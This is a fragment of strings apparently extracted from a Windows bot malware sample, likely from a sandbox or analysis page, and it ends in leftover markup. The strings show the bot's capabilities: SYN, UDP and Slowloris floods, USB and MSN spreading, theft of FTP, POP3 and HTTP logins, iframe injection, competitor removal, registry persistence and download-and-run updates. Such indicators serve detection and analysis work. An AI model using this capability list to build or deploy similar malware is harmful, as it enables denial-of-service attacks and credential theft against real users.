s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. 
[e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%WinDir%\Explorer.EXE</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\explorer.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre></Type></pre></w></pre></Type></pre></w></pre></Type></pre></w></pre></Type></pre></w>